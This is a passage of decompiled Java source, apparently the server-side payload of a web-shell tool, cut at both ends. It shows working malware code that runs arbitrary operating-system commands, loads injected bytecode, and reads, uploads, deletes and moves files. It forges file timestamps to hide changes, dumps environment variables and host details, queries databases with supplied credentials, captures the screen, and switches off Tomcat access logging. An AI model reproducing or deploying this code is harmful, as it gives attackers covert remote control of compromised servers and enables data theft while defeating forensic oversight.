file.setExecutable(true); 544 | } 545 | ret = "ok"; 546 | return ret.getBytes(); 547 | } 548 | ret = "Java version is less than 1.6"; 549 | return ret.getBytes(); 550 | } 551 | else { 552 | if (!"fileTimeAttr".equals(type)) { 553 | ret = "no ExcuteType"; 554 | return ret.getBytes(); 555 | } 556 | Class class$4; 557 | if ((class$4 = payload.class$3) == null) { 558 | try { 559 | class$4 = (payload.class$3 = Class.forName("java.io.File")); 560 | } 561 | catch (ClassNotFoundException ex2) { 562 | throw new NoClassDefFoundError(ex2.getMessage()); 563 | } 564 | } 565 | if (this.getMethodByClass(class$4, "setLastModified", new Class[] { Long.TYPE }) != null) { 566 | Date date = new Date(0L); 567 | final StringBuilder builder = new StringBuilder(); 568 | builder.append(attr); 569 | final char[] cs = new char[13 - builder.length()]; 570 | Arrays.fill(cs, '0'); 571 | builder.append(cs); 572 | date = new Date(date.getTime() + Long.parseLong(builder.toString())); 573 | file.setLastModified(date.getTime()); 574 | ret = "ok"; 575 | try { 576 | final Class nioFile = Class.forName("java.nio.file.Paths"); 577 | final Class basicFileAttributeViewClass = Class.forName("java.nio.file.attribute.BasicFileAttributeView"); 578 | final Class filesClass = Class.forName("java.nio.file.Files"); 579 | if (nioFile != null && basicFileAttributeViewClass != null && filesClass != null) { 580 | final Path value = Paths.get(fileName, new String[0]); 581 | Class class$5; 582 | if ((class$5 = payload.class$4) == null) { 583 | try { 584 | class$5 = (payload.class$4 = Class.forName("java.nio.file.attribute.BasicFileAttributeView")); 585 | } 586 | catch (ClassNotFoundException ex3) { 587 | throw new NoClassDefFoundError(ex3.getMessage()); 588 | } 589 | } 590 | final BasicFileAttributeView attributeView = Files.getFileAttributeView(value, (Class)class$5, new LinkOption[0]); 591 | attributeView.setTimes(FileTime.fromMillis(date.getTime()), FileTime.fromMillis(date.getTime()), FileTime.fromMillis(date.getTime())); 592 | } 593 | } 594 | catch (Exception ex4) {} 595 | return ret.getBytes(); 596 | } 597 | ret = "Java version is less than 1.2"; 598 | return ret.getBytes(); 599 | } 600 | } 601 | catch (Exception e) { 602 | return String.format("Exception errMsg:%s", e.getMessage()).getBytes(); 603 | } 604 | } 605 | ret = "type or attr or fileName is null"; 606 | return ret.getBytes(); 607 | } 608 | 609 | public byte[] readFile() { 610 | final String fileName = this.get("fileName"); 611 | if (fileName != null) { 612 | final File file = new File(fileName); 613 | try { 614 | if (file.exists() && file.isFile()) { 615 | byte[] data = new byte[(int)file.length()]; 616 | if (data.length > 0) { 617 | int readOneLen = 0; 618 | final FileInputStream fileInputStream = new FileInputStream(file); 619 | while ((readOneLen += fileInputStream.read(data, readOneLen, data.length - readOneLen)) < data.length) {} 620 | fileInputStream.close(); 621 | } 622 | else { 623 | byte[] temData = new byte[3145728]; 624 | final FileInputStream fileInputStream = new FileInputStream(file); 625 | final int readLen = fileInputStream.read(temData); 626 | if (readLen > 0) { 627 | data = new byte[readLen]; 628 | System.arraycopy(temData, 0, data, 0, data.length); 629 | } 630 | fileInputStream.close(); 631 | temData = null; 632 | } 633 | return data; 634 | } 635 | return "file does not exist".getBytes(); 636 | } 637 | catch (Exception e) { 638 | return e.getMessage().getBytes(); 639 | } 640 | } 641 | return "No parameter fileName".getBytes(); 642 | } 643 | 644 | public byte[] uploadFile() { 645 | final String fileName = this.get("fileName"); 646 | final byte[] fileValue = this.getByteArray("fileValue"); 647 | if (fileName != null && fileValue != null) { 648 | try { 649 | final File file = new File(fileName); 650 | file.createNewFile(); 651 | final FileOutputStream fileOutputStream = new FileOutputStream(file); 652 | fileOutputStream.write(fileValue); 653 | fileOutputStream.close(); 654 | return "ok".getBytes(); 655 | } 656 | catch (Exception e) { 657 | return e.getMessage().getBytes(); 658 | } 659 | } 660 | return "No parameter fileName and fileValue".getBytes(); 661 | } 662 | 663 | public byte[] newFile() { 664 | final String fileName = this.get("fileName"); 665 | if (fileName != null) { 666 | final File file = new File(fileName); 667 | try { 668 | if (file.createNewFile()) { 669 | return "ok".getBytes(); 670 | } 671 | return "fail".getBytes(); 672 | } 673 | catch (Exception e) { 674 | return e.getMessage().getBytes(); 675 | } 676 | } 677 | return "No parameter fileName".getBytes(); 678 | } 679 | 680 | public byte[] newDir() { 681 | final String dirName = this.get("dirName"); 682 | if (dirName != null) { 683 | final File file = new File(dirName); 684 | try { 685 | if (file.mkdirs()) { 686 | return "ok".getBytes(); 687 | } 688 | return "fail".getBytes(); 689 | } 690 | catch (Exception e) { 691 | return e.getMessage().getBytes(); 692 | } 693 | } 694 | return "No parameter fileName".getBytes(); 695 | } 696 | 697 | public byte[] deleteFile() { 698 | final String dirName = this.get("fileName"); 699 | if (dirName != null) { 700 | try { 701 | final File file = new File(dirName); 702 | this.deleteFiles(file); 703 | return "ok".getBytes(); 704 | } 705 | catch (Exception e) { 706 | return e.getMessage().getBytes(); 707 | } 708 | } 709 | return "No parameter fileName".getBytes(); 710 | } 711 | 712 | public byte[] moveFile() { 713 | final String srcFileName = this.get("srcFileName"); 714 | final String destFileName = this.get("destFileName"); 715 | if (srcFileName != null && destFileName != null) { 716 | final File file = new File(srcFileName); 717 | try { 718 | if (!file.exists()) { 719 | return "The target does not exist".getBytes(); 720 | } 721 | if (file.renameTo(new File(destFileName))) { 722 | return "ok".getBytes(); 723 | } 724 | return "fail".getBytes(); 725 | } 726 | catch (Exception e) { 727 | return e.getMessage().getBytes(); 728 | } 729 | } 730 | return "No parameter srcFileName,destFileName".getBytes(); 731 | } 732 | 733 | public byte[] copyFile() { 734 | final String srcFileName = this.get("srcFileName"); 735 | final String destFileName = this.get("destFileName"); 736 | if (srcFileName != null && destFileName != null) { 737 | final File srcFile = new File(srcFileName); 738 | final File destFile = new File(destFileName); 739 | try { 740 | if (srcFile.exists() && srcFile.isFile()) { 741 | final FileInputStream fileInputStream = new FileInputStream(srcFile); 742 | final FileOutputStream fileOutputStream = new FileOutputStream(destFile); 743 | final byte[] data = new byte[5120]; 744 | int readNum = 0; 745 | while ((readNum = fileInputStream.read(data)) > -1) { 746 | fileOutputStream.write(data, 0, readNum); 747 | } 748 | fileInputStream.close(); 749 | fileOutputStream.close(); 750 | return "ok".getBytes(); 751 | } 752 | return "The target does not exist or is not a file".getBytes(); 753 | } 754 | catch (Exception e) { 755 | return e.getMessage().getBytes(); 756 | } 757 | } 758 | return "No parameter srcFileName,destFileName".getBytes(); 759 | } 760 | 761 | public byte[] include() { 762 | final byte[] binCode = this.getByteArray("binCode"); 763 | final String className = this.get("codeName"); 764 | if (binCode != null && className != null) { 765 | try { 766 | final payload payload = new payload(this.getClass().getClassLoader()); 767 | final Class module = payload.g(binCode); 768 | this.sessionMap.put(className, module); 769 | return "ok".getBytes(); 770 | } 771 | catch (Exception e) { 772 | if (this.sessionMap.get(className) != null) { 773 | return "ok".getBytes(); 774 | } 775 | return e.getMessage().getBytes(); 776 | } 777 | } 778 | return "No parameter binCode,codeName".getBytes(); 779 | } 780 | 781 | public Object getSessionAttribute(final String keyString) { 782 | if (this.httpSession != null) { 783 | final Object httpSession = this.httpSession; 784 | final String methodName = "getAttribute"; 785 | final Class[] parameterClass = { null }; 786 | final int n = 0; 787 | Class class$2; 788 | if ((class$2 = payload.class$2) == null) { 789 | try { 790 | class$2 = (payload.class$2 = Class.forName("java.lang.String")); 791 | } 792 | catch (ClassNotFoundException ex) { 793 | throw new NoClassDefFoundError(ex.getMessage()); 794 | } 795 | } 796 | parameterClass[n] = class$2; 797 | return this.getMethodAndInvoke(httpSession, methodName, parameterClass, new Object[] { keyString }); 798 | } 799 | return null; 800 | } 801 | 802 | public void setSessionAttribute( String keyString, Object value) { 803 | if (this.httpSession != null) { 804 | final Object httpSession = this.httpSession; 805 | final String methodName = "setAttribute"; 806 | final Class[] parameterClass = new Class[2]; 807 | final int n = 0; 808 | Class class$2; 809 | if ((class$2 = payload.class$2) == null) { 810 | try { 811 | class$2 = (payload.class$2 = Class.forName("java.lang.String")); 812 | } 813 | catch (ClassNotFoundException ex) { 814 | throw new NoClassDefFoundError(ex.getMessage()); 815 | } 816 | } 817 | parameterClass[n] = class$2; 818 | final int n2 = 1; 819 | Class class$3; 820 | if ((class$3 = payload.class$5) == null) { 821 | try { 822 | class$3 = (payload.class$5 = Class.forName("java.lang.Object")); 823 | } 824 | catch (ClassNotFoundException ex2) { 825 | throw new NoClassDefFoundError(ex2.getMessage()); 826 | } 827 | } 828 | parameterClass[n2] = class$3; 829 | this.getMethodAndInvoke(httpSession, methodName, parameterClass, new Object[] { keyString, value }); 830 | } 831 | } 832 | 833 | public byte[] execCommand() { 834 | final String argsCountStr = this.get("argsCount"); 835 | if (argsCountStr != null && argsCountStr.length() > 0) { 836 | try { 837 | Process process = null; 838 | final ArrayList argsList = new ArrayList(); 839 | final int argsCount = Integer.parseInt(argsCountStr); 840 | if (argsCount <= 0) { 841 | return "argsCount <=0".getBytes(); 842 | } 843 | for (int i = 0; i < argsCount; ++i) { 844 | final String val = this.get(String.format("arg-%d", new Integer(i))); 845 | if (val != null) { 846 | argsList.add(val); 847 | } 848 | } 849 | final String[] cmdarray = new String[argsList.size()]; 850 | for (int j = 0; j < argsList.size(); ++j) { 851 | cmdarray[j] = (String) argsList.get(j); 852 | } 853 | process = Runtime.getRuntime().exec((String[]) argsList.toArray(new String[0])); 854 | if (process == null) { 855 | return "Unable to start process".getBytes(); 856 | } 857 | final InputStream inputStream = process.getInputStream(); 858 | final InputStream errorInputStream = process.getErrorStream(); 859 | final ByteArrayOutputStream memStream = new ByteArrayOutputStream(1024); 860 | final byte[] buff = new byte[521]; 861 | int readNum = 0; 862 | if (inputStream != null) { 863 | while ((readNum = inputStream.read(buff)) > 0) { 864 | memStream.write(buff, 0, readNum); 865 | } 866 | } 867 | if (errorInputStream != null) { 868 | while ((readNum = errorInputStream.read(buff)) > 0) { 869 | memStream.write(buff, 0, readNum); 870 | } 871 | } 872 | return memStream.toByteArray(); 873 | } 874 | catch (Exception e) { 875 | return e.getMessage().getBytes(); 876 | } 877 | } 878 | return "No parameter argsCountStr".getBytes(); 879 | } 880 | 881 | public byte[] getBasicsInfo() { 882 | try { 883 | final Enumeration keys = System.getProperties().keys(); 884 | String basicsInfo = new String(); 885 | basicsInfo = String.valueOf(basicsInfo) + "FileRoot : " + this.listFileRoot() + "\n"; 886 | basicsInfo = String.valueOf(basicsInfo) + "CurrentDir : " + new File("").getAbsoluteFile() + "/" + "\n"; 887 | basicsInfo = String.valueOf(basicsInfo) + "CurrentUser : " + System.getProperty("user.name") + "\n"; 888 | basicsInfo = String.valueOf(basicsInfo) + "ProcessArch : " + System.getProperty("sun.arch.data.model") + "\n"; 889 | try { 890 | String tmpdir = System.getProperty("java.io.tmpdir"); 891 | final char lastChar = tmpdir.charAt(tmpdir.length() - 1); 892 | if (lastChar != '\\' && lastChar != '/') { 893 | tmpdir = String.valueOf(tmpdir) + File.separator; 894 | } 895 | basicsInfo = String.valueOf(basicsInfo) + "TempDirectory : " + tmpdir + "\n"; 896 | } 897 | catch (Exception ex) {} 898 | basicsInfo = String.valueOf(basicsInfo) + "DocBase : " + this.getDocBase() + "\n"; 899 | basicsInfo = String.valueOf(basicsInfo) + "RealFile : " + this.getRealPath() + "\n"; 900 | basicsInfo = String.valueOf(basicsInfo) + "servletRequest : " + ((this.servletRequest == null) ? "null" : (String.valueOf(String.valueOf(this.servletRequest.hashCode())) + "\n")); 901 | basicsInfo = String.valueOf(basicsInfo) + "servletContext : " + ((this.servletContext == null) ? "null" : (String.valueOf(String.valueOf(this.servletContext.hashCode())) + "\n")); 902 | basicsInfo = String.valueOf(basicsInfo) + "httpSession : " + ((this.httpSession == null) ? "null" : (String.valueOf(String.valueOf(this.httpSession.hashCode())) + "\n")); 903 | try { 904 | basicsInfo = String.valueOf(basicsInfo) + "OsInfo : " + String.format("os.name: %s os.version: %s os.arch: %s", System.getProperty("os.name"), System.getProperty("os.version"), System.getProperty("os.arch")) + "\n"; 905 | } 906 | catch (Exception e) { 907 | basicsInfo = String.valueOf(basicsInfo) + "OsInfo : " + e.getMessage() + "\n"; 908 | } 909 | basicsInfo = String.valueOf(basicsInfo) + "IPList : " + getLocalIPList() + "\n"; 910 | while (keys.hasMoreElements()) { 911 | final Object object = keys.nextElement(); 912 | if (object instanceof String) { 913 | final String key = (String)object; 914 | basicsInfo = String.valueOf(basicsInfo) + key + " : " + System.getProperty(key) + "\n"; 915 | } 916 | } 917 | final Map envMap = this.getEnv(); 918 | if (envMap != null) { 919 | Iterator iterator = envMap.keySet().iterator(); 920 | while (iterator.hasNext()) { 921 | String key = (String) iterator.next(); 922 | basicsInfo = String.valueOf(basicsInfo) + key + " : " + envMap.get(key) + "\n"; 923 | } 924 | } 925 | return basicsInfo.getBytes(); 926 | } 927 | catch (Exception e2) { 928 | return e2.getMessage().getBytes(); 929 | } 930 | } 931 | 932 | public byte[] screen() { 933 | try { 934 | final Robot robot = new Robot(); 935 | final BufferedImage as = robot.createScreenCapture(new Rectangle(Toolkit.getDefaultToolkit().getScreenSize().width, Toolkit.getDefaultToolkit().getScreenSize().height)); 936 | final ByteArrayOutputStream bs = new ByteArrayOutputStream(); 937 | ImageIO.write(as, "png", ImageIO.createImageOutputStream(bs)); 938 | final byte[] data = bs.toByteArray(); 939 | bs.close(); 940 | return data; 941 | } 942 | catch (Exception e) { 943 | return e.getMessage().getBytes(); 944 | } 945 | } 946 | 947 | public byte[] execSql() throws Exception { 948 | final String charset = this.get("dbCharset"); 949 | final String dbType = this.get("dbType"); 950 | final String dbHost = this.get("dbHost"); 951 | final String dbPort = this.get("dbPort"); 952 | final String dbUsername = this.get("dbUsername"); 953 | final String dbPassword = this.get("dbPassword"); 954 | final String execType = this.get("execType"); 955 | final String execSql = new String(this.getByteArray("execSql"), charset); 956 | if (dbType != null && dbHost != null && dbPort != null && dbUsername != null && dbPassword != null && execType != null && execSql != null) { 957 | try { 958 | try { 959 | Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver"); 960 | } 961 | catch (Exception ex) {} 962 | try { 963 | Class.forName("oracle.jdbc.driver.OracleDriver"); 964 | } 965 | catch (Exception e2) { 966 | try { 967 | Class.forName("oracle.jdbc.OracleDriver"); 968 | } 969 | catch (Exception ex2) {} 970 | } 971 | try { 972 | Class.forName("com.mysql.cj.jdbc.Driver"); 973 | } 974 | catch (Exception e2) { 975 | try { 976 | Class.forName("com.mysql.jdbc.Driver"); 977 | } 978 | catch (Exception ex3) {} 979 | } 980 | try { 981 | Class.forName("org.postgresql.Driver"); 982 | } 983 | catch (Exception ex4) {} 984 | try { 985 | Class.forName("org.sqlite.JDBC"); 986 | } 987 | catch (Exception ex5) {} 988 | String connectUrl = null; 989 | if ("mysql".equals(dbType)) { 990 | connectUrl = "jdbc:mysql://" + dbHost + ":" + dbPort + "/" + "?useSSL=false&serverTimezone=UTC&zeroDateTimeBehavior=convertToNull&noDatetimeStringSync=true&characterEncoding=utf-8"; 991 | } 992 | else if ("oracle".equals(dbType)) { 993 | connectUrl = "jdbc:oracle:thin:@" + dbHost + ":" + dbPort + ":orcl"; 994 | } 995 | else if ("sqlserver".equals(dbType)) { 996 | connectUrl = "jdbc:sqlserver://" + dbHost + ":" + dbPort + ";"; 997 | } 998 | else if ("postgresql".equals(dbType)) { 999 | connectUrl = "jdbc:postgresql://" + dbHost + ":" + dbPort + "/"; 1000 | } 1001 | else if ("sqlite".equals(dbType)) { 1002 | connectUrl = "jdbc:sqlite:" + dbHost; 1003 | } 1004 | if (dbHost.indexOf("jdbc:") != -1) { 1005 | connectUrl = dbHost; 1006 | } 1007 | if (connectUrl != null) { 1008 | try { 1009 | Connection dbConn = null; 1010 | try { 1011 | dbConn = getConnection(connectUrl, dbUsername, dbPassword); 1012 | } 1013 | catch (Exception ex6) {} 1014 | if (dbConn == null) { 1015 | dbConn = DriverManager.getConnection(connectUrl, dbUsername, dbPassword); 1016 | } 1017 | final Statement statement = dbConn.createStatement(); 1018 | if (execType.equals("select")) { 1019 | String data = "ok\n"; 1020 | final ResultSet resultSet = statement.executeQuery(execSql); 1021 | final ResultSetMetaData metaData = resultSet.getMetaData(); 1022 | final int columnNum = metaData.getColumnCount(); 1023 | for (int i = 0; i < columnNum; ++i) { 1024 | data = String.valueOf(data) + this.base64Encode(String.format("%s", metaData.getColumnName(i + 1))) + "\t"; 1025 | } 1026 | data = String.valueOf(data) + "\n"; 1027 | while (resultSet.next()) { 1028 | for (int i = 0; i < columnNum; ++i) { 1029 | data = String.valueOf(data) + this.base64Encode(String.format("%s", resultSet.getString(i + 1))) + "\t"; 1030 | } 1031 | data = String.valueOf(data) + "\n"; 1032 | } 1033 | resultSet.close(); 1034 | statement.close(); 1035 | dbConn.close(); 1036 | return data.getBytes(); 1037 | } 1038 | final int affectedNum = statement.executeUpdate(execSql); 1039 | statement.close(); 1040 | dbConn.close(); 1041 | return ("Query OK, " + affectedNum + " rows affected").getBytes(); 1042 | } 1043 | catch (Exception e) { 1044 | return e.getMessage().getBytes(); 1045 | } 1046 | } 1047 | return ("no " + dbType + " Dbtype").getBytes(); 1048 | } 1049 | catch (Exception e2) { 1050 | return e2.getMessage().getBytes(); 1051 | } 1052 | } 1053 | return "No parameter dbType,dbHost,dbPort,dbUsername,dbPassword,execType,execSql".getBytes(); 1054 | } 1055 | 1056 | public byte[] close() { 1057 | try { 1058 | if (this.httpSession != null) { 1059 | this.getMethodAndInvoke(this.httpSession, "invalidate", null, null); 1060 | } 1061 | return "ok".getBytes(); 1062 | } 1063 | catch (Exception e) { 1064 | return e.getMessage().getBytes(); 1065 | } 1066 | } 1067 | 1068 | public byte[] bigFileUpload() { 1069 | final String fileName = this.get("fileName"); 1070 | final byte[] fileContents = this.getByteArray("fileContents"); 1071 | final String position = this.get("position"); 1072 | try { 1073 | if (position == null) { 1074 | final FileOutputStream fileOutputStream = new FileOutputStream(fileName, true); 1075 | fileOutputStream.write(fileContents); 1076 | fileOutputStream.flush(); 1077 | fileOutputStream.close(); 1078 | } 1079 | else { 1080 | final RandomAccessFile fileOutputStream2 = new RandomAccessFile(fileName, "rw"); 1081 | fileOutputStream2.seek(Integer.parseInt(position)); 1082 | fileOutputStream2.write(fileContents); 1083 | fileOutputStream2.close(); 1084 | } 1085 | return "ok".getBytes(); 1086 | } 1087 | catch (Exception e) { 1088 | return String.format("Exception errMsg:%s", e.getMessage()).getBytes(); 1089 | } 1090 | } 1091 | 1092 | public byte[] bigFileDownload() { 1093 | final String fileName = this.get("fileName"); 1094 | final String mode = this.get("mode"); 1095 | final String readByteNumString = this.get("readByteNum"); 1096 | final String positionString = this.get("position"); 1097 | try { 1098 | if ("fileSize".equals(mode)) { 1099 | return String.valueOf(new File(fileName).length()).getBytes(); 1100 | } 1101 | if (!"read".equals(mode)) { 1102 | return "no mode".getBytes(); 1103 | } 1104 | final int position = Integer.valueOf(positionString); 1105 | final int readByteNum = Integer.valueOf(readByteNumString); 1106 | final byte[] readData = new byte[readByteNum]; 1107 | final FileInputStream fileInputStream = new FileInputStream(fileName); 1108 | fileInputStream.skip(position); 1109 | final int readNum = fileInputStream.read(readData); 1110 | fileInputStream.close(); 1111 | if (readNum == readData.length) { 1112 | return readData; 1113 | } 1114 | return copyOf(readData, readNum); 1115 | } 1116 | catch (Exception e) { 1117 | return String.format("Exception errMsg:%s", e.getMessage()).getBytes(); 1118 | } 1119 | } 1120 | 1121 | public static byte[] copyOf(final byte[] original, final int newLength) { 1122 | final byte[] arrayOfByte = new byte[newLength]; 1123 | System.arraycopy(original, 0, arrayOfByte, 0, Math.min(original.length, newLength)); 1124 | return arrayOfByte; 1125 | } 1126 | 1127 | public Map getEnv() { 1128 | try { 1129 | final int jreVersion = Integer.parseInt(System.getProperty("java.version").substring(2, 3)); 1130 | if (jreVersion >= 5) { 1131 | try { 1132 | Class class$6; 1133 | if ((class$6 = payload.class$6) == null) { 1134 | try { 1135 | class$6 = (payload.class$6 = Class.forName("java.lang.System")); 1136 | } 1137 | catch (ClassNotFoundException ex) { 1138 | throw new NoClassDefFoundError(ex.getMessage()); 1139 | } 1140 | } 1141 | final Method method = class$6.getMethod("getenv", (Class[])new Class[0]); 1142 | if (method != null) { 1143 | final Class returnType = method.getReturnType(); 1144 | Class class$7; 1145 | if ((class$7 = payload.class$7) == null) { 1146 | try { 1147 | class$7 = (payload.class$7 = Class.forName("java.util.Map")); 1148 | } 1149 | catch (ClassNotFoundException ex2) { 1150 | throw new NoClassDefFoundError(ex2.getMessage()); 1151 | } 1152 | } 1153 | if (returnType.isAssignableFrom(class$7)) { 1154 | return (Map)method.invoke(null, (Object[])null); 1155 | } 1156 | } 1157 | return null; 1158 | } 1159 | catch (Exception e) { 1160 | return null; 1161 | } 1162 | } 1163 | return null; 1164 | } 1165 | catch (Exception e2) { 1166 | return null; 1167 | } 1168 | } 1169 | 1170 | public String getDocBase() { 1171 | try { 1172 | return this.getRealPath(); 1173 | } 1174 | catch (Exception e) { 1175 | return e.getMessage(); 1176 | } 1177 | } 1178 | 1179 | public static Connection getConnection(final String url, final String userName, final String password) { 1180 | Connection connection = null; 1181 | try { 1182 | Class class$8; 1183 | if ((class$8 = payload.class$8) == null) { 1184 | try { 1185 | class$8 = (payload.class$8 = Class.forName("java.sql.DriverManager")); 1186 | } 1187 | catch (ClassNotFoundException ex) { 1188 | throw new NoClassDefFoundError(ex.getMessage()); 1189 | } 1190 | } 1191 | final Field[] fields = class$8.getDeclaredFields(); 1192 | Field field = null; 1193 | for (int i = 0; i < fields.length; ++i) { 1194 | field = fields[i]; 1195 | if (field.getName().indexOf("rivers") != -1) { 1196 | Class class$9; 1197 | if ((class$9 = payload.class$9) == null) { 1198 | try { 1199 | class$9 = (payload.class$9 = Class.forName("java.util.List")); 1200 | } 1201 | catch (ClassNotFoundException ex2) { 1202 | throw new NoClassDefFoundError(ex2.getMessage()); 1203 | } 1204 | } 1205 | if (class$9.isAssignableFrom(field.getType())) { 1206 | break; 1207 | } 1208 | } 1209 | field = null; 1210 | } 1211 | if (field != null) { 1212 | field.setAccessible(true); 1213 | final List drivers = (List)field.get(null); 1214 | final Iterator iterator = drivers.iterator(); 1215 | while (iterator.hasNext()) { 1216 | if (connection != null) { 1217 | break; 1218 | } 1219 | try { 1220 | final Object object = iterator.next(); 1221 | Driver driver = null; 1222 | Class class$10; 1223 | if ((class$10 = payload.class$10) == null) { 1224 | try { 1225 | class$10 = (payload.class$10 = Class.forName("java.sql.Driver")); 1226 | } 1227 | catch (ClassNotFoundException ex3) { 1228 | throw new NoClassDefFoundError(ex3.getMessage()); 1229 | } 1230 | } 1231 | if (!class$10.isAssignableFrom(object.getClass())) { 1232 | final Field[] driverInfos = object.getClass().getDeclaredFields(); 1233 | for (int j = 0; j < driverInfos.length; ++j) { 1234 | Class class$11; 1235 | if ((class$11 = payload.class$10) == null) { 1236 | try { 1237 | class$11 = (payload.class$10 = Class.forName("java.sql.Driver")); 1238 | } 1239 | catch (ClassNotFoundException ex4) { 1240 | throw new NoClassDefFoundError(ex4.getMessage()); 1241 | } 1242 | } 1243 | if (class$11.isAssignableFrom(driverInfos[j].getType())) { 1244 | driverInfos[j].setAccessible(true); 1245 | driver = (Driver)driverInfos[j].get(object); 1246 | break; 1247 | } 1248 | } 1249 | } 1250 | if (driver == null) { 1251 | continue; 1252 | } 1253 | final Properties properties = new Properties(); 1254 | if (userName != null) { 1255 | properties.put("user", userName); 1256 | } 1257 | if (password != null) { 1258 | properties.put("password", password); 1259 | } 1260 | connection = driver.connect(url, properties); 1261 | } 1262 | catch (Exception ex5) {} 1263 | } 1264 | } 1265 | } 1266 | catch (Exception ex6) {} 1267 | return connection; 1268 | } 1269 | 1270 | public static String getLocalIPList() { 1271 | final List ipList = new ArrayList(); 1272 | try { 1273 | final Enumeration networkInterfaces = NetworkInterface.getNetworkInterfaces(); 1274 | while (networkInterfaces.hasMoreElements()) { 1275 | final NetworkInterface networkInterface = (NetworkInterface) networkInterfaces.nextElement(); 1276 | final Enumeration inetAddresses = networkInterface.getInetAddresses(); 1277 | while (inetAddresses.hasMoreElements()) { 1278 | final InetAddress inetAddress = (InetAddress) inetAddresses.nextElement(); 1279 | if (inetAddress != null) { 1280 | final String ip = inetAddress.getHostAddress(); 1281 | ipList.add(ip); 1282 | } 1283 | } 1284 | } 1285 | } 1286 | catch (Exception ex) {} 1287 | return Arrays.toString(ipList.toArray()); 1288 | } 1289 | 1290 | public String getRealPath() { 1291 | try { 1292 | if (this.servletContext == null) { 1293 | return "servletContext is Null"; 1294 | } 1295 | final Class class1 = this.servletContext.getClass(); 1296 | final String methodName = "getRealPath"; 1297 | final Class[] parameters = { null }; 1298 | final int n = 0; 1299 | Class class$2; 1300 | if ((class$2 = payload.class$2) == null) { 1301 | try { 1302 | class$2 = (payload.class$2 = Class.forName("java.lang.String")); 1303 | } 1304 | catch (ClassNotFoundException ex) { 1305 | throw new NoClassDefFoundError(ex.getMessage()); 1306 | } 1307 | } 1308 | parameters[n] = class$2; 1309 | final Method getRealPathMethod = this.getMethodByClass(class1, methodName, parameters); 1310 | if (getRealPathMethod == null) { 1311 | return "no method getRealPathMethod"; 1312 | } 1313 | final Object retObject = getRealPathMethod.invoke(this.servletContext, "/"); 1314 | if (retObject != null) { 1315 | return retObject.toString(); 1316 | } 1317 | return "Null"; 1318 | } 1319 | catch (Exception e) { 1320 | return e.getMessage(); 1321 | } 1322 | } 1323 | 1324 | public void deleteFiles(final File f) throws Exception { 1325 | if (f.isDirectory()) { 1326 | final File[] x = f.listFiles(); 1327 | for (int i = 0; i < x.length; ++i) { 1328 | final File fs = x[i]; 1329 | this.deleteFiles(fs); 1330 | } 1331 | } 1332 | f.delete(); 1333 | } 1334 | 1335 | Object invoke(final Object obj, final String methodName, final Object[] parameters) { 1336 | try { 1337 | final ArrayList classes = new ArrayList(); 1338 | if (parameters != null) { 1339 | for (int i = 0; i < parameters.length; ++i) { 1340 | final Object o1 = parameters[i]; 1341 | if (o1 != null) { 1342 | classes.add(o1.getClass()); 1343 | } 1344 | else { 1345 | classes.add(null); 1346 | } 1347 | } 1348 | } 1349 | final Method method = this.getMethodByClass(obj.getClass(), methodName, (Class[]) classes.toArray(new Class[0])); 1350 | return method.invoke(obj, parameters); 1351 | } 1352 | catch (Exception ex) { 1353 | return null; 1354 | } 1355 | } 1356 | 1357 | Object getMethodAndInvoke(final Object obj, final String methodName, final Class[] parameterClass, final Object[] parameters) { 1358 | try { 1359 | final Method method = this.getMethodByClass(obj.getClass(), methodName, parameterClass); 1360 | if (method != null) { 1361 | return method.invoke(obj, parameters); 1362 | } 1363 | } 1364 | catch (Exception ex) {} 1365 | return null; 1366 | } 1367 | 1368 | Method getMethodByClass(Class cs, final String methodName, final Class[] parameters) { 1369 | Method method = null; 1370 | while (cs != null) { 1371 | try { 1372 | method = cs.getDeclaredMethod(methodName, (Class[])parameters); 1373 | method.setAccessible(true); 1374 | cs = null; 1375 | } 1376 | catch (Exception e) { 1377 | cs = cs.getSuperclass(); 1378 | } 1379 | } 1380 | return method; 1381 | } 1382 | 1383 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { 1384 | Field f = null; 1385 | if (obj instanceof Field) { 1386 | f = (Field)obj; 1387 | } 1388 | else { 1389 | final Method method = null; 1390 | Class cs = obj.getClass(); 1391 | while (cs != null) { 1392 | try { 1393 | f = cs.getDeclaredField(fieldName); 1394 | cs = null; 1395 | } 1396 | catch (Exception e) { 1397 | cs = cs.getSuperclass(); 1398 | } 1399 | } 1400 | } 1401 | f.setAccessible(true); 1402 | return f.get(obj); 1403 | } 1404 | 1405 | private void noLog(final Object servletContext) { 1406 | try { 1407 | final Object applicationContext = getFieldValue(servletContext, "context"); 1408 | Object container = getFieldValue(applicationContext, "context"); 1409 | final ArrayList arrayList = new ArrayList(); 1410 | while (container != null) { 1411 | arrayList.add(container); 1412 | container = this.invoke(container, "getParent", null); 1413 | } 1414 | for (int i = 0; i < arrayList.size(); ++i) { 1415 | try { 1416 | final Object pipeline = this.invoke(arrayList.get(i), "getPipeline", null); 1417 | if (pipeline != null) { 1418 | Object valve = this.invoke(pipeline, "getFirst", null); 1419 | while (valve != null) { 1420 | if (this.getMethodByClass(valve.getClass(), "getCondition", null) != null) { 1421 | final Class class1 = valve.getClass(); 1422 | final String methodName = "setCondition"; 1423 | final Class[] parameters = { null }; 1424 | final int n = 0; 1425 | Class class$2; 1426 | if ((class$2 = payload.class$2) == null) { 1427 | try { 1428 | class$2 = (payload.class$2 = Class.forName("java.lang.String")); 1429 | } 1430 | catch (ClassNotFoundException ex) { 1431 | throw new NoClassDefFoundError(ex.getMessage()); 1432 | } 1433 | } 1434 | parameters[n] = class$2; 1435 | if (this.getMethodByClass(class1, methodName, parameters) != null) { 1436 | String condition = (String)this.invoke(valve, "getCondition", new Object[0]); 1437 | condition = ((condition == null) ? "FuckLog" : condition); 1438 | this.invoke(valve, "setCondition", new Object[] { condition }); 1439 | final Class class2 = this.servletRequest.getClass(); 1440 | final String methodName2 = "setAttribute"; 1441 | final Class[] parameters2 = new Class[2]; 1442 | final int n2 = 0; 1443 | Class class$3; 1444 | if ((class$3 = payload.class$2) == null) { 1445 | try { 1446 | class$3 = (payload.class$2 = Class.forName("java.lang.String")); 1447 | } 1448 | catch (ClassNotFoundException ex2) { 1449 | throw new NoClassDefFoundError(ex2.getMessage()); 1450 | } 1451 | } 1452 | parameters2[n2] = class$3; 1453 | final int n3 = 1; 1454 | Class class$4; 1455 | if ((class$4 = payload.class$2) == null) { 1456 | try { 1457 | class$4 = (payload.class$2 = Class.forName("java.lang.String")); 1458 | } 1459 | catch (ClassNotFoundException ex3) { 1460 | throw new NoClassDefFoundError(ex3.getMessage()); 1461 | } 1462 | } 1463 | parameters2[n3] = class$4; 